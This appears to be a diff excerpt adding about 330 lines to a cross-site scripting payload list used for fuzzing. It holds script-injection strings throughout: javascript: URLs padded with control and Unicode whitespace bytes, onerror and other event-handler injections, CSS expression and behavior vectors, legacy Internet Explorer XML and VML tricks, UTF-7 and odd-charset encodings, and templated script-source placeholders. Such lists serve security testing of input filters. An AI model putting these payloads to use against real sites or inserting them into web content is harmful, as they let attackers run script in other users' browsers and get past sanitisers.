|
|
1540
|
+
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
|
|
1541
|
+
ABC<div style="x:\x09expression(javascript:alert(1)">DEF
|
|
1542
|
+
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
|
|
1543
|
+
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
|
|
1544
|
+
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
|
|
1545
|
+
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
|
|
1546
|
+
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
|
|
1547
|
+
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
|
|
1548
|
+
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
|
|
1549
|
+
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
|
|
1550
|
+
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
|
|
1551
|
+
ABC<div style="x:\x20expression(javascript:alert(1)">DEF
|
|
1552
|
+
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
|
|
1553
|
+
ABC<div style="x:\x00expression(javascript:alert(1)">DEF
|
|
1554
|
+
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
|
|
1555
|
+
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
|
|
1556
|
+
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
|
|
1557
|
+
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
|
|
1558
|
+
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
|
|
1559
|
+
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
|
|
1560
|
+
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
|
|
1561
|
+
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
|
|
1562
|
+
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1563
|
+
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1564
|
+
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1565
|
+
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1566
|
+
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1567
|
+
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1568
|
+
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1569
|
+
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1570
|
+
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1571
|
+
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1572
|
+
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1573
|
+
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1574
|
+
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1575
|
+
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1576
|
+
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1577
|
+
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1578
|
+
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1579
|
+
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1580
|
+
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1581
|
+
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1582
|
+
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1583
|
+
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1584
|
+
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1585
|
+
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1586
|
+
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1587
|
+
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1588
|
+
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1589
|
+
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1590
|
+
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1591
|
+
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1592
|
+
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1593
|
+
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1594
|
+
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1595
|
+
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1596
|
+
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1597
|
+
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1598
|
+
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1599
|
+
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1600
|
+
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1601
|
+
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1602
|
+
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1603
|
+
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1604
|
+
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1605
|
+
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1606
|
+
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1607
|
+
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1608
|
+
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1609
|
+
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1610
|
+
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1611
|
+
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1612
|
+
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1613
|
+
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1614
|
+
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1615
|
+
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1616
|
+
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1617
|
+
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1618
|
+
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1619
|
+
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
|
|
1620
|
+
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
|
|
1621
|
+
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
|
|
1622
|
+
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
|
|
1623
|
+
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
|
|
1624
|
+
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
|
|
1625
|
+
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
|
|
1626
|
+
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
|
|
1627
|
+
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
|
|
1628
|
+
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
|
|
1629
|
+
"`'><script>\x3Bjavascript:alert(1)</script>
|
|
1630
|
+
"`'><script>\x0Djavascript:alert(1)</script>
|
|
1631
|
+
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
|
|
1632
|
+
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
|
|
1633
|
+
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
|
|
1634
|
+
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
|
|
1635
|
+
"`'><script>\x09javascript:alert(1)</script>
|
|
1636
|
+
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
|
|
1637
|
+
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
|
|
1638
|
+
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
|
|
1639
|
+
"`'><script>\x00javascript:alert(1)</script>
|
|
1640
|
+
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
|
|
1641
|
+
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
|
|
1642
|
+
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
|
|
1643
|
+
"`'><script>\x0Cjavascript:alert(1)</script>
|
|
1644
|
+
"`'><script>\x2Bjavascript:alert(1)</script>
|
|
1645
|
+
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
|
|
1646
|
+
"`'><script>-javascript:alert(1)</script>
|
|
1647
|
+
"`'><script>\x0Ajavascript:alert(1)</script>
|
|
1648
|
+
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
|
|
1649
|
+
"`'><script>\x7Ejavascript:alert(1)</script>
|
|
1650
|
+
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
|
|
1651
|
+
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
|
|
1652
|
+
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
|
|
1653
|
+
"`'><script>\xC2\x85javascript:alert(1)</script>
|
|
1654
|
+
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
|
|
1655
|
+
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
|
|
1656
|
+
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
|
|
1657
|
+
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
|
|
1658
|
+
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
|
|
1659
|
+
"`'><script>\x21javascript:alert(1)</script>
|
|
1660
|
+
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
|
|
1661
|
+
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
|
|
1662
|
+
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
|
|
1663
|
+
"`'><script>\x0Bjavascript:alert(1)</script>
|
|
1664
|
+
"`'><script>\x20javascript:alert(1)</script>
|
|
1665
|
+
"`'><script>\xC2\xA0javascript:alert(1)</script>
|
|
1666
|
+
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
|
|
1667
|
+
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
|
|
1668
|
+
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
|
|
1669
|
+
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
|
|
1670
|
+
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
|
|
1671
|
+
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
|
|
1672
|
+
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
|
|
1673
|
+
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
|
|
1674
|
+
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
|
|
1675
|
+
<script\x2F>javascript:alert(1)</script>
|
|
1676
|
+
<script\x20>javascript:alert(1)</script>
|
|
1677
|
+
<script\x0D>javascript:alert(1)</script>
|
|
1678
|
+
<script\x0A>javascript:alert(1)</script>
|
|
1679
|
+
<script\x0C>javascript:alert(1)</script>
|
|
1680
|
+
<script\x00>javascript:alert(1)</script>
|
|
1681
|
+
<script\x09>javascript:alert(1)</script>
|
|
1682
|
+
"><img src=x onerror=javascript:alert(1)>
|
|
1683
|
+
"><img src=x onerror=javascript:alert('1')>
|
|
1684
|
+
"><img src=x onerror=javascript:alert("1")>
|
|
1685
|
+
"><img src=x onerror=javascript:alert(`1`)>
|
|
1686
|
+
"><img src=x onerror=javascript:alert(('1'))>
|
|
1687
|
+
"><img src=x onerror=javascript:alert(("1"))>
|
|
1688
|
+
"><img src=x onerror=javascript:alert((`1`))>
|
|
1689
|
+
"><img src=x onerror=javascript:alert(A)>
|
|
1690
|
+
"><img src=x onerror=javascript:alert((A))>
|
|
1691
|
+
"><img src=x onerror=javascript:alert(('A'))>
|
|
1692
|
+
"><img src=x onerror=javascript:alert('A')>
|
|
1693
|
+
"><img src=x onerror=javascript:alert(("A"))>
|
|
1694
|
+
"><img src=x onerror=javascript:alert("A")>
|
|
1695
|
+
"><img src=x onerror=javascript:alert((`A`))>
|
|
1696
|
+
"><img src=x onerror=javascript:alert(`A`)>
|
|
1697
|
+
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
|
|
1698
|
+
`"'><img src=xxx:x onerror\x00=javascript:alert(1)>
|
|
1699
|
+
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
|
|
1700
|
+
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
|
|
1701
|
+
`"'><img src=xxx:x onerror\x20=javascript:alert(1)>
|
|
1702
|
+
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
|
|
1703
|
+
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
|
|
1704
|
+
<script>javascript:alert(1)<\x00/script>
|
|
1705
|
+
<img src=# onerror\x3D"javascript:alert(1)" >
|
|
1706
|
+
<input onfocus=javascript:alert(1) autofocus>
|
|
1707
|
+
<input onblur=javascript:alert(1) autofocus><input autofocus>
|
|
1708
|
+
<video poster=javascript:javascript:alert(1)//
|
|
1709
|
+
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
|
|
1710
|
+
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
|
|
1711
|
+
<video><source onerror="javascript:javascript:alert(1)">
|
|
1712
|
+
<video onerror="javascript:javascript:alert(1)"><source>
|
|
1713
|
+
<form><button formaction="javascript:javascript:alert(1)">X
|
|
1714
|
+
<body oninput=javascript:alert(1)><input autofocus>
|
|
1715
|
+
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
|
|
1716
|
+
<frameset onload=javascript:alert(1)>
|
|
1717
|
+
<table background="javascript:javascript:alert(1)">
|
|
1718
|
+
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
|
|
1719
|
+
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
|
|
1720
|
+
<![><img src="]><img src=x onerror=javascript:alert(1)//">
|
|
1721
|
+
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
|
|
1722
|
+
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
|
|
1723
|
+
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
|
|
1724
|
+
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
|
|
1725
|
+
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
|
|
1726
|
+
<object data="data:text/html;base64,%(base64)s">
|
|
1727
|
+
<embed src="data:text/html;base64,%(base64)s">
|
|
1728
|
+
<b <script>alert(1)</script>0
|
|
1729
|
+
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
|
|
1730
|
+
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
|
|
1731
|
+
<embed src="javascript:alert(1)">
|
|
1732
|
+
<img src="javascript:alert(1)">
|
|
1733
|
+
<image src="javascript:alert(1)">
|
|
1734
|
+
<script src="javascript:alert(1)">
|
|
1735
|
+
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
|
|
1736
|
+
<? foo="><script>javascript:alert(1)</script>">
|
|
1737
|
+
<! foo="><script>javascript:alert(1)</script>">
|
|
1738
|
+
</ foo="><script>javascript:alert(1)</script>">
|
|
1739
|
+
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
|
|
1740
|
+
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
|
|
1741
|
+
<% foo><x foo="%><script>javascript:alert(1)</script>">
|
|
1742
|
+
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
|
|
1743
|
+
<img \x00src=x onerror="alert(1)">
|
|
1744
|
+
<img \x47src=x onerror="javascript:alert(1)">
|
|
1745
|
+
<img \x11src=x onerror="javascript:alert(1)">
|
|
1746
|
+
<img \x12src=x onerror="javascript:alert(1)">
|
|
1747
|
+
<img\x47src=x onerror="javascript:alert(1)">
|
|
1748
|
+
<img\x10src=x onerror="javascript:alert(1)">
|
|
1749
|
+
<img\x13src=x onerror="javascript:alert(1)">
|
|
1750
|
+
<img\x32src=x onerror="javascript:alert(1)">
|
|
1751
|
+
<img\x47src=x onerror="javascript:alert(1)">
|
|
1752
|
+
<img\x11src=x onerror="javascript:alert(1)">
|
|
1753
|
+
<img \x47src=x onerror="javascript:alert(1)">
|
|
1754
|
+
<img \x34src=x onerror="javascript:alert(1)">
|
|
1755
|
+
<img \x39src=x onerror="javascript:alert(1)">
|
|
1756
|
+
<img \x00src=x onerror="javascript:alert(1)">
|
|
1757
|
+
<img src\x09=x onerror="javascript:alert(1)">
|
|
1758
|
+
<img src\x10=x onerror="javascript:alert(1)">
|
|
1759
|
+
<img src\x13=x onerror="javascript:alert(1)">
|
|
1760
|
+
<img src\x32=x onerror="javascript:alert(1)">
|
|
1761
|
+
<img src\x12=x onerror="javascript:alert(1)">
|
|
1762
|
+
<img src\x11=x onerror="javascript:alert(1)">
|
|
1763
|
+
<img src\x00=x onerror="javascript:alert(1)">
|
|
1764
|
+
<img src\x47=x onerror="javascript:alert(1)">
|
|
1765
|
+
<img src=x\x09onerror="javascript:alert(1)">
|
|
1766
|
+
<img src=x\x10onerror="javascript:alert(1)">
|
|
1767
|
+
<img src=x\x11onerror="javascript:alert(1)">
|
|
1768
|
+
<img src=x\x12onerror="javascript:alert(1)">
|
|
1769
|
+
<img src=x\x13onerror="javascript:alert(1)">
|
|
1770
|
+
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
|
|
1771
|
+
<img src=x onerror=\x09"javascript:alert(1)">
|
|
1772
|
+
<img src=x onerror=\x10"javascript:alert(1)">
|
|
1773
|
+
<img src=x onerror=\x11"javascript:alert(1)">
|
|
1774
|
+
<img src=x onerror=\x12"javascript:alert(1)">
|
|
1775
|
+
<img src=x onerror=\x32"javascript:alert(1)">
|
|
1776
|
+
<img src=x onerror=\x00"javascript:alert(1)">
|
|
1777
|
+
<a href=javascript:javascript:alert(1)>XXX</a>
|
|
1778
|
+
<img src="x` `<script>javascript:alert(1)</script>"` `>
|
|
1779
|
+
<img src onerror /" '"= alt=javascript:alert(1)//">
|
|
1780
|
+
<title onpropertychange=javascript:alert(1)></title><title title=>
|
|
1781
|
+
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
|
|
1782
|
+
<!--[if]><script>javascript:alert(1)</script -->
|
|
1783
|
+
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
|
|
1784
|
+
<script src="/\%(jscript)s"></script>
|
|
1785
|
+
<script src="\\%(jscript)s"></script>
|
|
1786
|
+
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
|
|
1787
|
+
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
|
|
1788
|
+
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
|
|
1789
|
+
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
|
|
1790
|
+
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
|
|
1791
|
+
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
|
|
1792
|
+
<style>*[{}@import'%(css)s?]</style>X
|
|
1793
|
+
<div style="font-family:'foo ;color:red;';">XXX
|
|
1794
|
+
<div style="font-family:foo}color=red;">XXX
|
|
1795
|
+
<// style=x:expression\28javascript:alert(1)\29>
|
|
1796
|
+
<style>*{x:expression(javascript:alert(1))}</style>
|
|
1797
|
+
<div style=content:url(%(svg)s)></div>
|
|
1798
|
+
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
|
|
1799
|
+
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
|
|
1800
|
+
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
|
|
1801
|
+
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
|
|
1802
|
+
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
|
|
1803
|
+
<x style="background:url('x;color:red;/*')">XXX</x>
|
|
1804
|
+
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
|
|
1805
|
+
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
|
|
1806
|
+
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
|
|
1807
|
+
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
|
|
1808
|
+
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
|
1809
|
+
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
|
1810
|
+
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
|
|
1811
|
+
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
|
|
1812
|
+
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>
|
|
1813
|
+
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>
|
|
1814
|
+
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
|
|
1815
|
+
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
|
|
1816
|
+
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
|
|
1817
|
+
<x style="behavior:url(%(sct)s)">
|
|
1818
|
+
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
|
|
1819
|
+
<event-source src="%(event)s" onload="javascript:alert(1)">
|
|
1820
|
+
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
|
|
1821
|
+
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>">
|
|
1822
|
+
<script>%(payload)s</script>
|
|
1823
|
+
<script src=%(jscript)s></script>
|
|
1824
|
+
<script language='javascript' src='%(jscript)s'></script>
|
|
1825
|
+
<script>javascript:alert(1)</script>
|
|
1826
|
+
<IMG SRC="javascript:javascript:alert(1);">
|
|
1827
|
+
<IMG SRC=javascript:javascript:alert(1)>
|
|
1828
|
+
<IMG SRC=`javascript:javascript:alert(1)`>
|
|
1829
|
+
<SCRIPT SRC=%(jscript)s?<B>
|
|
1830
|
+
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
|
|
1831
|
+
<BODY ONLOAD=javascript:alert(1)>
|
|
1832
|
+
<BODY ONLOAD=javascript:javascript:alert(1)>
|
|
1833
|
+
<IMG SRC="jav ascript:javascript:alert(1);">
|
|
1834
|
+
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
|
|
1835
|
+
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
|
|
1836
|
+
<<SCRIPT>%(payload)s//<</SCRIPT>
|
|
1837
|
+
<IMG SRC="javascript:javascript:alert(1)"
|
|
1838
|
+
<iframe src=%(scriptlet)s <
|
|
1839
|
+
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
|
|
1840
|
+
<IMG DYNSRC="javascript:javascript:alert(1)">
|
|
1841
|
+
<IMG LOWSRC="javascript:javascript:alert(1)">
|
|
1842
|
+
<BGSOUND SRC="javascript:javascript:alert(1);">
|
|
1843
|
+
<BR SIZE="&{javascript:alert(1)}">
|
|
1844
|
+
<LAYER SRC="%(scriptlet)s"></LAYER>
|
|
1845
|
+
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
|
|
1846
|
+
<STYLE>@import'%(css)s';</STYLE>
|
|
1847
|
+
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
|
|
1848
|
+
<XSS STYLE="behavior: url(%(htc)s);">
|
|
1849
|
+
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
|
|
1850
|
+
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
|
|
1851
|
+
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
|
|
1852
|
+
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
|
|
1853
|
+
<TABLE BACKGROUND="javascript:javascript:alert(1)">
|
|
1854
|
+
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
|
|
1855
|
+
<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
|
|
1856
|
+
<DIV STYLE="width:expression(javascript:alert(1));">
|
|
1857
|
+
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
|
|
1858
|
+
<XSS STYLE="xss:expression(javascript:alert(1))">
|
|
1859
|
+
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
|
|
1860
|
+
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
|
|
1861
|
+
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
|
|
1862
|
+
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
|
|
1863
|
+
<BASE HREF="javascript:javascript:alert(1);//">
|
|
1864
|
+
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
|
|
1865
|
+
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
|
|
1866
|
+
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
|
|
1867
|
+
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
|
|
1868
|
+
<SCRIPT SRC="%(jpg)s"></SCRIPT>
|
|
1869
|
+
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
|
|
1870
|
+
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
|
|
1871
|
+
